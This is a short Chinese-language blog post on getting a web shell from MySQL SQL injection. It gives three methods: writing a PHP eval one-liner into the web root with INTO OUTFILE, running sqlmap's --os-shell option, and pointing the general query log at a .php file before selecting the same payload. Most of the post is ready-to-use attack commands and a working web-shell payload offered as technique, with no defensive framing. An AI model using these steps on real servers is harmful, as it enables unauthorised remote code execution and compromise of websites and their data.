SQL注入Getshell的几种方式

March 28, 2023 less than 1 minute read

SQL注入Getshell的几种方式

SQL注入不仅阔以导致数据泄露，也有阔能getshell哦

0x01 into outfile

$ show global variables like '%secure%';
$ select '<?php eval($_POST[yyj]);?>' into outfile "C/phpstudy/www/shell.php";

$ sqlmap -u xxx --sql-shell
$ select @@datadir; #查看文件路径（mysql/data的路径，根目录一般与mysql处于同一目录）
$ select @@secure_file_priv;

0x02 sqlmap –os-shell

1.原理 –os-shell就是使用udf提权获取webshell。也是通过into outfile向服务器写入两个文件，一个可以直接执行系统命令，另一个可以上传文件。需要知道网站根目录以及数据库dba权限。

$ sqlmap -u xxx --os-shell

0x03 写日志

尝试用日志写入木马getshell不需要secure_file_priv没有具体值，但是需要知道网站根目录。

$ show global variables like '%general%'  #查看日志功能是否开启
$ set global general_log = 'ON' #未开启的话设置为on
$ set global general_log_file = 'C:/phpStudy1/WWW/yyj.php'
$ select '<?php @eval($_POST[yyj]); ?>' 

yueyejian

SQL注入Getshell的几种方式

0x01 into outfile

0x02 sqlmap –os-shell

0x03 写日志